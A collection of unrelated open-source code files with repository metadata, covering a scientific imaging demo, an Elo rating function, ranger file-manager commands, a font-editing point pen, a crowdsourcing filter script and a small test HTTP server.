Google drive link, https://drive.google.com/file/d/0B3v6W1bQwN_AVjdYdERHUDBsMmM/edit?usp=sharing\n\
Dropbox link, https://www.dropbox.com/s/963c4ymfmbjg5dm/SOFC.zip')
raise Exception('File not found: %s' % filename)
return t
def unzip(source_filename, verbose=True):
with zipfile.ZipFile(source_filename) as zf:
num = len(zf.infolist())
for idx, member in enumerate(zf.infolist()):
            if verbose and num >= 100 and idx % (num // 100) == 0:
print("{:3d}% Extracting {}/{}".format(
int(idx/num*100), idx+1, len(zf.infolist())))
zf.extract(member)
def run():
# download to this folder
current_folder = os.sep.join(__file__.split(os.sep)[:-1])
dpc_demo_data_path = os.path.join(current_folder, 'SOFC')
if not os.path.exists(dpc_demo_data_path):
sofc_file = os.path.join(current_folder, 'SOFC.zip')
print('The required test data directory was not found.'
'\nDownloading the test data to %s' % dpc_demo_data_path)
# todo make this not print every fraction of a second
call(('wget https://www.dropbox.com/s/963c4ymfmbjg5dm/SOFC.zip -P %s' %
current_folder),
shell=True)
# unzip it into this directory
unzip(sofc_file)
# 1. Set parameters
start_point = [1, 0]
first_image = 1
pixel_size = (55, 55)
focus_to_det = 1.46e6
scan_xstep = 0.1
scan_ystep = 0.1
scan_rows = 121
scan_cols = 121
energy = 19.5
roi = None
padding = 0
weighting = 1.
bad_pixels = None
solver = 'Nelder-Mead'
images = ImageSequence(dpc_demo_data_path + "/*.tif")
img_size = images[0].shape
ref_image = np.ones(img_size)
scale = True
negate = True
print('running dpc')
# 2. Use dpc.dpc_runner
phase, amplitude = dpc.dpc_runner(
ref_image, images, start_point, pixel_size, focus_to_det, scan_rows,
scan_cols, scan_xstep, scan_ystep, energy, padding, weighting, solver,
roi, bad_pixels, negate, scale)
# 3. Save intermediate and final results
scipy.misc.imsave(os.path.join(current_folder, 'phase.jpg'), phase)
np.savetxt(os.path.join(current_folder, 'phase.txt'), phase)
scipy.misc.imsave(os.path.join(current_folder, 'amplitude.jpg'), amplitude)
np.savetxt(os.path.join(current_folder, 'amplitude.txt'), amplitude)
if __name__ == '__main__':
run()
|
{
"content_hash": "d7db6f3303a786f51c27d2a445e76d4d",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 114,
"avg_line_length": 31.293233082706767,
"alnum_prop": 0.6504084574723691,
"repo_name": "ericdill/scikit-beam-examples",
"id": "92e1b5388aca7725002980cce8393f5e32cf4160",
"size": "6597",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "demos/dpc/dpc_demo.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "24813"
}
],
"symlink_target": ""
}
|
"""
Resource link.
This file is part of the everest project.
See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information.
Created on Jun 29, 2011.
"""
from everest.resources.interfaces import IResourceLink
from everest.resources.utils import resource_to_url
from zope.interface import implementer # pylint: disable=E0611,F0401
__docformat__ = 'reStructuredText en'
__all__ = ['Link',
]
@implementer(IResourceLink)
class Link(object):
"""
A resource link.
:note: The URL for the linked resource is created lazily; at
instantiation time, we may not have a request to generate the URL.
"""
def __init__(self, linked_resource, rel,
type=None, title=None, length=None): # pylint: disable=W0622
self.__linked_resource = linked_resource
self.rel = rel
self.type = type
self.title = title
self.length = length
@property
def href(self):
return resource_to_url(self.__linked_resource)
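# Illustrative usage (a sketch, not part of the module; `my_resource` is a
# placeholder for any resource registered with everest's URL machinery):
#
#   link = Link(my_resource, rel='self', title='Self link')
#   link.href  # resolved lazily via resource_to_url when accessed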
|
{
"content_hash": "7930fc971f1fc35d7b2c436a9dc2968b",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 77,
"avg_line_length": 28,
"alnum_prop": 0.6716269841269841,
"repo_name": "helixyte/everest",
"id": "a6e4457dd86d7d3d2b330576d0fb1a3e647a5a3a",
"size": "1008",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "everest/resources/link.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "255"
},
{
"name": "Makefile",
"bytes": "4594"
},
{
"name": "Python",
"bytes": "1167712"
},
{
"name": "Shell",
"bytes": "4513"
}
],
"symlink_target": ""
}
|
def elo(winner_rank, loser_rank, weighting):
"""
    :param winner_rank: The current rank of the player that won the match.
    :param loser_rank: The current rank of the player that lost the match.
    :param weighting: The weighting factor to suit your comp.
    :return: (winner_new_rank, loser_new_rank) tuple.
This follows the ELO ranking method.
"""
winner_rank_transformed = 10 ** (winner_rank / 400)
opponent_rank_transformed = 10 ** (loser_rank / 400)
transformed_sum = winner_rank_transformed + opponent_rank_transformed
winner_score = winner_rank_transformed / transformed_sum
loser_score = opponent_rank_transformed / transformed_sum
    winner_rank = winner_rank + weighting * (1 - winner_score)
    loser_rank = loser_rank - weighting * loser_score
# Set a floor of 100 for the rankings.
winner_rank = 100 if winner_rank < 100 else winner_rank
loser_rank = 100 if loser_rank < 100 else loser_rank
winner_rank = float('{result:.2f}'.format(result=winner_rank))
loser_rank = float('{result:.2f}'.format(result=loser_rank))
return winner_rank, loser_rank
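# A quick worked example (illustrative only; 32 is a common chess K-factor,
# not something this module prescribes). The two scores sum to 1, so the
# winner gains exactly what the loser loses:
#
#   >>> elo(1500, 1400, 32)
#   (1511.52, 1388.48)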
|
{
"content_hash": "aebcba5c4e5c90a3288cda39f43caea8",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 73,
"avg_line_length": 38.82142857142857,
"alnum_prop": 0.6807727690892365,
"repo_name": "ulternate/table_tennis_league",
"id": "be9bd5f7d840a39915f5c547fcf6ced95fe85e75",
"size": "1087",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rankings/elo.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "105"
},
{
"name": "HTML",
"bytes": "19930"
},
{
"name": "Python",
"bytes": "24809"
}
],
"symlink_target": ""
}
|
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_swarming_lesser_dewback.iff"
result.attribute_template_id = 9
result.stfName("monster_name","dewback")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
{
"content_hash": "a194ee2e0d5794cdddc67230f9ae02e9",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 69,
"avg_line_length": 23,
"alnum_prop": 0.6989966555183946,
"repo_name": "anhstudios/swganh",
"id": "6f82ddc433771fe82010c6b512180c2212e33093",
"size": "444",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "data/scripts/templates/object/mobile/shared_swarming_lesser_dewback.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11887"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2357839"
},
{
"name": "CMake",
"bytes": "41264"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7503510"
},
{
"name": "SQLPL",
"bytes": "42770"
}
],
"symlink_target": ""
}
|
"""
This file is part of ranger, the console file manager.
This configuration file is licensed under the same terms as ranger.
===================================================================
NOTE: If you copied this file to ~/.config/ranger/commands_full.py,
then it will NOT be loaded by ranger, and only serve as a reference.
===================================================================
This file contains ranger's commands.
It's all in python; lines beginning with # are comments.
Note that additional commands are automatically generated from the methods
of the class ranger.core.actions.Actions.
You can customize commands in the file ~/.config/ranger/commands.py.
It has the same syntax as this file. In fact, you can just copy this
file there with `ranger --copy-config=commands' and make your modifications.
But make sure you update your configs when you update ranger.
===================================================================
Every class defined here which is a subclass of `Command' will be used as a
command in ranger. Several methods are defined to interface with ranger:
execute(): called when the command is executed.
cancel(): called when closing the console.
tab(tabnum): called when <TAB> is pressed.
quick(): called after each keypress.
tab() argument tabnum is 1 for <TAB> and -1 for <S-TAB> by default
The return values for tab() can be either:
None: There is no tab completion
A string: Change the console to this string
A list/tuple/generator: cycle through every item in it
The return value for quick() can be:
False: Nothing happens
True: Execute the command afterwards
The return value for execute() and cancel() doesn't matter.
===================================================================
Commands have certain attributes and methods that facilitate parsing of
the arguments:
self.line: The whole line that was written in the console.
self.args: A list of all (space-separated) arguments to the command.
self.quantifier: If this command was mapped to the key "X" and
the user pressed 6X, self.quantifier will be 6.
self.arg(n): The n-th argument, or an empty string if it doesn't exist.
self.rest(n): The n-th argument plus everything that followed. For example,
if the command was "search foo bar a b c", rest(2) will be "bar a b c"
self.start(n): Anything before the n-th argument. For example, if the
command was "search foo bar a b c", start(2) will be "search foo"
===================================================================
And this is a little reference for common ranger functions and objects:
self.fm: A reference to the "fm" object which contains most information
about ranger.
self.fm.notify(string): Print the given string on the screen.
self.fm.notify(string, bad=True): Print the given string in RED.
self.fm.reload_cwd(): Reload the current working directory.
self.fm.thisdir: The current working directory. (A File object.)
self.fm.thisfile: The current file. (A File object too.)
self.fm.thistab.get_selection(): A list of all selected files.
self.fm.execute_console(string): Execute the string as a ranger command.
self.fm.open_console(string): Open the console with the given string
already typed in for you.
self.fm.move(direction): Moves the cursor in the given direction, which
can be something like down=3, up=5, right=1, left=1, to=6, ...
File objects (for example self.fm.thisfile) have these useful attributes and
methods:
tfile.path: The path to the file.
tfile.basename: The base name only.
tfile.load_content(): Force a loading of the directories content (which
obviously works with directories only)
tfile.is_directory: True/False depending on whether it's a directory.
For advanced commands it is unavoidable to dive a bit into the source code
of ranger.
===================================================================
"""
from __future__ import absolute_import, division, print_function
# Standard Library
import re
from glob import iglob
from os import environ, makedirs, mknod, getenv
from os.path import exists, expanduser, isfile, join, lexists
from pathlib import Path
from subprocess import DEVNULL, PIPE, Popen, run
from typing import Iterable, List, Optional, Pattern, Set
# 3rd Party
# You always need to import ranger.api.commands here to get the Command class:
from ranger.api.commands import Command
def get_flags(cmd: str) -> Set[str]:
    # Extract anything that looks like a long or short flag from `cmd --help`.
    # The regex is a reconstruction: the original grep call was missing its
    # pattern argument, which would make grep fail.
    help_text: bytes = run([cmd, '--help'], stderr=DEVNULL, stdout=PIPE).stdout
    flags = run(['grep', '-E', '-o', r'--?[a-zA-Z][-a-zA-Z]*'], input=help_text,
                stdout=PIPE, stderr=DEVNULL).stdout.decode('utf-8').split('\n')
    return set(flags)
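# A minimal example command (an illustration, not part of the original
# config): typing `:hello Ada` in ranger prints a greeting in the status
# line. It uses only the Command API documented in the module docstring
# above (execute, self.rest, self.fm.notify).
class hello(Command):
    """:hello [<name>]
    Greet <name> (or the world) in the status line.
    """
    def execute(self):
        name = self.rest(1) or 'world'
        self.fm.notify(f'Hello, {name}!')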
class git(Command):
"""git <subcommand> [<option>, ...] [--] [<file>, ...]
    Wrapper for git commands, with tab completion for subcommands, flags, branches and refs.
"""
non_i_cmds: Set[str] = {
'add',
'archive',
'clean',
'clone',
'fetch',
'init',
'mv',
'pull',
'push',
'rm',
}
opts: Set[str] = {
'--bare',
'--exec-path',
'--git-dir',
'--help',
'--html-path',
'--info-path',
'--man-path',
'--namespace',
'--no-pager',
'--no-replace-objects',
'--paginate',
'--version',
'--work-tree',
'-C',
'-c',
'-p',
}
refs: Set[str] = {
'HEAD',
'HEAD^1',
'HEAD^2',
'HEAD^3',
'HEAD~1',
'HEAD~2',
'HEAD~3',
'FETCH_HEAD',
'ORIG_HEAD',
'master',
}
cmds: Set[str] = {
'am',
'apply',
'bisect',
'blame',
'branch',
'cat-file',
'checkout',
'checkout-index',
'cherry',
'commit',
'commit-tree',
'count-objects',
'diff',
'diff-files',
'diff-index',
'diff-tree',
'fast-export',
'filter-branch',
'for-each-ref',
'for-ls-tree',
'grep',
'hash-object',
'help',
'index-pack',
'log',
'ls-files',
'merge',
'merge-file',
'merge-index',
'mktag',
'mktree',
'name-rev',
'pack-redundant',
'prune-packed',
'read-tree',
'rebase',
'reflog',
'remote',
'repack',
'reset',
'rev-list',
'show',
'show-branches',
'status',
'symbolic-ref',
'tag',
'unpack-file',
'update-ref',
'var',
'verify-pack',
'worktree',
'write-tree',
}
def _get_subcmd(self) -> Optional[str]:
if not self.args or len(self.args) == 1:
return None
for word in self.args[1:]:
if not word.startswith('-') and (word in git.cmds or word in git.non_i_cmds):
return word
return None
def execute(self):
if len(self.args) < 2:
return
sub_cmd: Optional[str] = self._get_subcmd()
if sub_cmd is None:
return
elif (sub_cmd not in git.cmds) and (sub_cmd not in git.non_i_cmds):
return
is_i: bool = sub_cmd in git.cmds
cmd: List[str] = ['git'] + \
(['--paginate'] if is_i else []) + self.args[1:]
# if any files marked add them to args
if len(self.fm.thistab.get_selection()) > 1:
cmd.append('--')
cmd.extend((i.path for i in self.fm.thistab.get_selection()))
try:
# synchronized
if is_i:
run(cmd)
# async
else:
from threading import Thread
thread: Thread = Thread(target=Popen, name=f"git-{sub_cmd}", kwargs={
'args': cmd, 'stdout': DEVNULL, 'stderr': DEVNULL})
thread.start()
self.fm.notify(f'{" ".join(cmd)} spawned')
self.fm.ui.redraw_main_column()
self.fm.ui.need_redraw = True
except Exception as e:
self.fm.notify(f'An error has occurred {e}', bad=True)
def tab(self, tabnum):
if len(self.args) == 1:
return (f"git {cmd}" for cmd in
(git.cmds | git.non_i_cmds | git.opts))
elif len(self.args) > 1:
# complete flags
if self.args[-1].startswith('-'):
subcmd: Optional[str] = self._get_subcmd()
                flags: Optional[Iterable[str]] = None
if subcmd:
pat: Pattern[str] = re.compile(
r'--[a-z][-a-z_]+|-[a-zA-Z]')
s: str = run(['git', '--no-pager', subcmd, '-h'],
stdout=PIPE,
stderr=DEVNULL).stdout.decode('utf-8')
flags = (
(" ".join(self.args[:-1]) +
' ' + match.group(0)).strip()
for match in pat.finditer(s))
else:
flags = (
(" ".join(self.args[:-1]) + " " + opt).strip()
for opt in git.opts)
if self.args[-1] == '-' or self.args[-1] == '--':
return flags
else:
return (flag for flag in flags
if (flag in self.args[-1]) or
(self.args[-1] in flag))
# relative paths
elif self.args[-1].startswith('./'):
return ((" ".join(self.args[:-1]) + " " + node).strip()
for node in iglob(join(self.args[-1], '*'))
if self.args[-1] in node or node in self.args[-1])
else:
pat: Pattern[str] = re.compile(r'\w+')
stdout: str = run(
['git', '--no-pager', 'branch'], stdout=PIPE, stderr=DEVNULL).stdout.decode('utf-8')
branches: Iterable[str] = {match.group(0) for match in pat.finditer(stdout)}
commit_SHAs: Set[str] = {line.split(' ')[0] for line in
run(['git', 'log', '--format=oneline'], stdout=PIPE).stdout.decode(
'utf-8').split('\n')}
return (
(" ".join(self.args[:-1]) + " " + cmd)
for cmd in
git.cmds | git.non_i_cmds | git.refs | commit_SHAs | branches | {f'origin/{ref}' for ref in
(git.refs | branches)}
if self.args[-1].startswith(cmd) or cmd.startswith(self.args[-1])
)
class toPDF(Command):
""":toPDF [<file>, ...]
Convert files to PDF.
NOTE requires libreoffice
"""
def execute(self):
d = Path('.')
did_files = []
args = ['libreoffice', '--headless', '--invisible', '--convert-to', 'pdf']
if len(self.args) > 1:
for node in self.args[1:]:
try:
run(args + [node])
did_files.append(node)
except Exception as e:
self.fm.notify(str(e), bad=True)
else:
for ext in ['ppt', 'pptx', 'doc', 'docx']:
for node in d.glob(f'*.{ext}'):
try:
run(args + [node])
did_files.append(node)
except Exception as e:
self.fm.notify(str(e), bad=True)
if len(did_files) == 0:
self.fm.notify('no *.{doc,docx,ppt,pptx} files', bad=True)
else:
self.fm.notify(f'converted {", ".join(did_files)}')
def tab(self, tabnum):
return self._tab_directory_content()
class vim(Command):
""":vim [<option>, ...] [<filename>, ...]
Open marked files in vim.
NOTE marking only works for the current directory.
"""
def execute(self):
cmd = [getenv('EDITOR', 'vim')] + self.args[1:]
if len(self.fm.thistab.get_selection()) > 1:
cmd.append('--')
cmd.extend((i.path for i in self.fm.thistab.get_selection()))
run(cmd, stdout=DEVNULL)
self.fm.ui.need_redraw = True
self.fm.ui.redraw_main_column()
def tab(self, tabnum):
opts: Set[str] = {'-t',
'+',
'-S',
'--cmd',
'-d',
'-M',
'-m',
'-o',
'-O',
'-p',
'-R'}
if len(self.args) > 1:
if self.args[-1].startswith('-'):
return ((" ".join(self.args[:-1]) + " " + opt).strip()
for opt in opts
if self.args[-1] in opt or opt in self.args[-1])
else:
return ((" ".join(self.args[:-1]) + " " + node).strip()
for node in iglob(join(self.args[-1], '*'))
if self.args[-1] in node or node in self.args[-1])
elif len(self.args) == 1:
return (f"vim {i}" for i in opts)
else:
return None
class lines_of_code(Command):
""":lines_of_code [<extension>]
Counts lines of code recursively from the current directory.
Optionally accepts an extension.
"""
extensions = {
t for t in run(['tokei', '-l'], stderr=DEVNULL, stdout=PIPE).stdout.decode('utf-8').split('\n') if ' ' not in t
}
def execute(self):
return run(['less'],
input=run(['tokei'] if len(self.args) == 1 else ['tokei', '--type', self.args[1]], stdout=PIPE,
stderr=DEVNULL).stdout)
def tab(self, tabnum):
return {
"lines_of_code {0}".format(ext) for ext in lines_of_code.extensions
if self.args[-1].lower() in ext.lower() or ext.lower() in self.args[-1].lower()
}
class grep(Command):
""":grep <string>
Looks for a string in all marked files or directories.
    Ripgrep is tried first; ranger falls back on git grep, then plain grep.
"""
def execute(self):
if self.rest(1):
# try ripgrep
if exists(expanduser('~/.cargo/bin/rg')):
x = run([
'rg', '--pretty', '--smart-case', '--threads=4',
'--after-context=1', '--before-context=1', '--regexp'
] + self.args[1:],
stdout=PIPE)
# try git grep if in a git repo
elif exists(
                    run(['git', 'rev-parse', '--show-toplevel'],
                        stdout=PIPE).stdout.decode('utf-8').strip()
):
x = run([
'git', 'grep', '--line-number', '--color=always', '-I',
'--after-context=3', '--threads=4', '--extended-regexp',
'--heading', '--break', '-e'
] + self.args[1:],
stdout=PIPE)
# fallback on grep
else:
                x = run([
                    'grep', '--line-number', '--extended-regexp',
                    '--color=always', '--with-filename', '-r', '-e'
                ] + self.args[1:],
                    stdout=PIPE)
if x.stdout:
run(['less', '-R', '-X', '-I'], input=x.stdout)
self.fm.ui.need_redraw = True
self.fm.ui.redraw_main_column()
else:
self.fm.notify('no matches', bad=True)
def tab(self, tabnum):
for flag in ('--after-context', '--basic-regexp', '--before-context', '--binary-files', '--byte-offset',
'--dereference-recursive', '--exclude-dir', '--exclude-from', '--extended-regexp', '--files-with',
'--files-without', '--fixed-strings', '--ignore-case', '--initial-tab', '--invert-match',
'--line-buffered', '--line-number', '--line-regexp', '--max-count', '--no-filename',
'--no-messages', '--null-data', '--only-matching', '--perl-regexp', '--unix-byte',
'--with-filename', '--word-regexp'):
if self.args[-1] in flag or flag in self.args[-1]:
yield f'{" ".join(self.args[:-1])} {flag}'
class untracked(Command):
""":untracked
List files not tracked by git (ignored).
Same as git --paginate ls-files --others
"""
def execute(self):
run(['git', '--paginate', 'ls-files', '--others'])
class tracked(Command):
""":tracked
List files tracked by git.
Same as git --paginate ls-files
"""
def execute(self):
run(['git', '--paginate', 'ls-files'])
self.fm.ui.need_redraw = True
self.fm.ui.redraw_main_column()
class mkdir(Command):
""":mkdir [<dirname>, ...]
    Creates directories with the given names.
"""
def execute(self):
if not self.args[1:]:
return
for i in self.args[1:]:
dirname = join(self.fm.thisdir.path, expanduser(i))
if not lexists(dirname):
makedirs(dirname, exist_ok=True)
else:
self.fm.notify(f"directory {dirname} exists!", bad=True)
break
def tab(self, tabnum):
return self._tab_directory_content()
class touch(Command):
""":touch [<fname>, ...]
Creates files with given names.
"""
def execute(self):
if not self.args[1:]:
return
for arg in self.args[1:]:
fname = join(self.fm.thisdir.path, expanduser(arg))
if not lexists(fname):
mknod(fname)
else:
self.fm.notify(f"file {fname} exists!", bad=True)
break
def tab(self, tabnum):
return self._tab_directory_content()
class make(Command):
""":make <subcommand>
Run make with specified rule.
NOTE Must have a Makefile in the same directory.
"""
def execute(self):
run(['make'] + self.args[1:], stdout=DEVNULL)
def tab(self, tabnum):
if not isfile('Makefile'):
self.fm.notify('No Makefile in this dir', bad=True)
return
with open('./Makefile', mode='r', encoding='utf-8') as f:
text: str = f.read()
pat = re.compile(r'^(\w+):', flags=re.M)
return (f'make {match.group(1)}' for match in pat.finditer(text))
class modified(Command):
""":modified
List files modified (Git).
Same as git --paginate ls-files --modified
"""
def execute(self):
run(['git', '--paginate', 'ls-files', '--modified'])
self.fm.ui.need_redraw = True
self.fm.ui.redraw_main_column()
class vimdiff(Command):
""":vimdiff <file1> <file2> | <file1> <file2> <file3>
Open vim in diff mode with passed files.
    NOTE when files are marked, only the ones in the current directory will be passed to vim.
Also, you can diff at most 3 files.
"""
def execute(self):
command = ['vim', '-d', '--']
if len(self.fm.thistab.get_selection()) > 1:
command.extend([i.path
for i in self.fm.thistab.get_selection()][:3])
elif self.args[1:]:
command.extend(self.args[1:4])
else:
return
run(command, stdout=DEVNULL)
self.fm.ui.need_redraw = True
self.fm.ui.redraw_main_column()
class edit(Command):
""":edit [<filename>, ...]
Open file in $EDITOR
"""
def execute(self):
if not self.arg(1):
run([environ['EDITOR'], self.fm.thisfile.path])
else:
run([environ['EDITOR']] + self.args[1:])
def tab(self, tabnum):
return self._tab_directory_content()
|
{
"content_hash": "2e518432343b6135932ca60a9b6f4eac",
"timestamp": "",
"source": "github",
"line_count": 647,
"max_line_length": 119,
"avg_line_length": 31.100463678516228,
"alnum_prop": 0.5002981810953185,
"repo_name": "nl253/Dot-files",
"id": "7185b9688d73d536a354e756aefe7596e7a8a68d",
"size": "20146",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": ".config/ranger/commands.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Haskell",
"bytes": "14326"
},
{
"name": "Python",
"bytes": "72736"
},
{
"name": "Shell",
"bytes": "43266"
},
{
"name": "Vim script",
"bytes": "798"
}
],
"symlink_target": ""
}
|
import collections
import csv
import argparse
import sys
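# Example invocation (illustrative only; the file names are hypothetical).
# Kept rows go to stdout, stats go to stderr:
#   python filter.py --task_csv task.csv --prev_task batch1.csv \
#       --spammers spammers.txt --min_ratings_per_item 5 > next_batch.csv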
if __name__ == '__main__':
parser = argparse.ArgumentParser(
        description='Remove some items from the task. The removal process is '
                    'controlled by queries/labels files or --prev_task')
parser.add_argument('--queries_file', help='txt file with queries (one per line)')
parser.add_argument('--labels_file',
help='txt file with labels (one per line; 1 - keep, 0 - filter out)')
parser.add_argument('--prev_task', help='csv file with previously judged items',
action='append')
parser.add_argument('--task_csv', help='input csv file', required=True)
parser.add_argument('--spammers',
help='File with ids of malicious workers (one per line)',
action='append')
parser.add_argument('--min_ratings_per_item',
help='Min ratings that item must have in order not to be sent for more ratings',
type=int, default=5)
parser.add_argument('--max_output_items',
help='Max amount of items to output. Used for batching the tasks on CF.',
type=int)
args = parser.parse_args()
if args.prev_task is None and (args.queries_file is None or args.labels_file is None):
print >>sys.stderr, 'Either --prev_task or labels/queries files have to be set'
parser.print_help()
sys.exit(1)
query_filter_labels = None
if args.queries_file is not None and args.labels_file is not None:
with open(args.queries_file) as q_file:
with open(args.labels_file) as l_file:
query_filter_labels = {q.rstrip(): int(l) for (q, l) in zip(q_file, l_file)}
spammers = set()
if args.spammers is not None:
for s_file_name in args.spammers:
with open(s_file_name) as f:
for worker_id in f:
spammers.add(worker_id.rstrip())
judged_items = collections.defaultdict(lambda: 0)
if args.prev_task is not None:
for fname in args.prev_task:
with open(fname) as f:
for row in csv.DictReader(f):
if row['_worker_id'] not in spammers:
judged_items[row['log_id']] += 1
num_judged_distribution = collections.Counter()
with open(args.task_csv) as input:
num = 0
reader = csv.DictReader(input)
writer = csv.DictWriter(sys.stdout, fieldnames=reader.fieldnames)
writer.writeheader()
for row in reader:
if query_filter_labels is not None and query_filter_labels[row['query']] != 1:
continue
num_judged_items = judged_items[row['log_id']]
num_judged_distribution[num_judged_items] += 1
if args.min_ratings_per_item is not None \
and num_judged_items >= args.min_ratings_per_item:
continue
writer.writerow(row)
num += 1
if args.max_output_items is not None and num >= args.max_output_items:
break
print >>sys.stderr, 'Judgements per item stats:', num_judged_distribution
|
{
"content_hash": "539b46c849dcd0c90688c37503b24345",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 92,
"avg_line_length": 43.0958904109589,
"alnum_prop": 0.5982199618563255,
"repo_name": "varepsilon/cas-eval",
"id": "3c17509725f76cc5b5ad64f1b1e2241057562aa2",
"size": "3956",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "logs_processing/filter.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "2727"
},
{
"name": "HTML",
"bytes": "44288"
},
{
"name": "JavaScript",
"bytes": "1063"
},
{
"name": "Jupyter Notebook",
"bytes": "44427"
},
{
"name": "Python",
"bytes": "96607"
}
],
"symlink_target": ""
}
|
from typing import Any, Dict, Tuple, Union, Optional
from fontTools.pens.pointPen import AbstractPointPen
from glyphsLib.types import Transform, Point
Number = Union[int, float]
class LayerPointPen(AbstractPointPen):
"""A point pen to draw onto GSLayer object.
See :mod:`fontTools.pens.basePen` and :mod:`fontTools.pens.pointPen` for an
introduction to pens.
"""
def __init__(self, layer: "GSLayer") -> None: # noqa: F821
self._layer: "GSLayer" = layer # noqa: F821
self._path: Optional["GSPath"] = None # noqa: F821
def beginPath(self, **kwargs: Any) -> None:
from glyphsLib.classes import GSPath
if self._path is not None:
raise ValueError("Call endPath first.")
self._path = GSPath()
self._path.closed = True # Until proven otherwise.
def endPath(self) -> None:
if self._path is None:
raise ValueError("Call beginPath first.")
if self._path.closed:
self._path.nodes.append(self._path.nodes.pop(0))
self._layer.paths.append(self._path)
self._path = None
def addPoint(
self,
pt: Tuple[Number, Number],
segmentType: Optional[str] = None,
smooth: bool = False,
name: Optional[str] = None,
userData: Optional[Dict[str, Any]] = None,
**kwargs: Any,
) -> None:
from glyphsLib.classes import GSNode
if self._path is None:
raise ValueError("Call beginPath first.")
if segmentType == "move":
if self._path.nodes:
raise ValueError("For an open contour, 'move' must come first.")
self._path.closed = False
node = GSNode(
Point(*pt),
nodetype=_to_glyphs_node_type(segmentType),
smooth=smooth,
name=name,
)
if userData:
node.userData = userData
self._path.nodes.append(node)
def addComponent(
self,
baseGlyph: str,
transformation: Union[
Transform, Tuple[float, float, float, float, float, float]
],
**kwargs: Any,
) -> None:
from glyphsLib.classes import GSComponent
if not isinstance(transformation, Transform):
transformation = Transform(*transformation)
component = GSComponent(baseGlyph, transform=transformation)
self._layer.components.append(component)
def _to_glyphs_node_type(node_type):
if node_type is None:
return "offcurve"
if node_type == "move":
return "line"
return node_type
def _to_ufo_node_type(node_type):
if node_type not in ["line", "curve", "qcurve"]:
return None
return node_type
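# Example usage (a minimal sketch, not part of the library): drawing a closed
# triangle onto a layer. Assumes GSLayer is importable from glyphsLib.classes,
# like the pen's other runtime imports.
def _example() -> None:
    from glyphsLib.classes import GSLayer

    layer = GSLayer()
    pen = LayerPointPen(layer)
    pen.beginPath()
    pen.addPoint((0, 0), segmentType="line")
    pen.addPoint((100, 0), segmentType="line")
    pen.addPoint((50, 80), segmentType="line")
    pen.endPath()
    assert len(layer.paths) == 1  # one closed GSPath with three nodes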
|
{
"content_hash": "63ea9a74fa95140e21652a387c449c4b",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 80,
"avg_line_length": 28.873684210526317,
"alnum_prop": 0.5931461903025884,
"repo_name": "googlefonts/glyphsLib",
"id": "e00edd5b6f74badbb219d53501440d36f3d23f57",
"size": "2743",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "Lib/glyphsLib/pens.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "998989"
}
],
"symlink_target": ""
}
|
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
d = generate_distutils_setup(
packages=[
'herbpy',
],
package_dir={'': 'src'},
)
setup(**d)
|
{
"content_hash": "cb02fa95abef0242c5ac202084eefe31",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 60,
"avg_line_length": 20.7,
"alnum_prop": 0.6570048309178744,
"repo_name": "Shushman/herbpy",
"id": "0632e194bd3a1222a97cbd713499b969144350c4",
"size": "229",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "CMake",
"bytes": "2198"
},
{
"name": "Makefile",
"bytes": "41"
},
{
"name": "Python",
"bytes": "104139"
}
],
"symlink_target": ""
}
|
"""A tiny web server.
This is intended to be used for testing, and
only run from within the
googleclient/native_client
"""
import BaseHTTPServer
import logging
import os
import SimpleHTTPServer
import SocketServer
import sys
logging.getLogger().setLevel(logging.INFO)
# Using 'localhost' means that we only accept connections
# via the loop back interface.
SERVER_PORT = 5103
SERVER_HOST = ''
# We only run from the native_client directory, so that not too much
# is exposed via this HTTP server. Everything in the directory is
# served, so there should never be anything potentially sensitive in
# the serving directory, especially if the machine might be a
# multi-user machine and not all users are trusted. We only serve via
# the loopback interface.
SAFE_DIR_COMPONENTS = ['native_client']
SAFE_DIR_SUFFIX = os.path.join(*SAFE_DIR_COMPONENTS)
def SanityCheckDirectory():
if os.getcwd().endswith(SAFE_DIR_SUFFIX):
return
logging.error('httpd.py should only be run from the %s', SAFE_DIR_SUFFIX)
logging.error('directory for testing purposes.')
logging.error('We are currently in %s', os.getcwd())
sys.exit(1)
# the sole purpose of this class is to make the BaseHTTPServer threaded
class ThreadedServer(SocketServer.ThreadingMixIn,
BaseHTTPServer.HTTPServer):
pass
def Run(server_address,
server_class=ThreadedServer,
handler_class=SimpleHTTPServer.SimpleHTTPRequestHandler):
httpd = server_class(server_address, handler_class)
logging.info('started server on port %d', httpd.server_address[1])
httpd.serve_forever()
if __name__ == '__main__':
SanityCheckDirectory()
if len(sys.argv) > 1:
Run((SERVER_HOST, int(sys.argv[1])))
else:
Run((SERVER_HOST, SERVER_PORT))
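# Usage sketch: run from within the native_client directory; an optional
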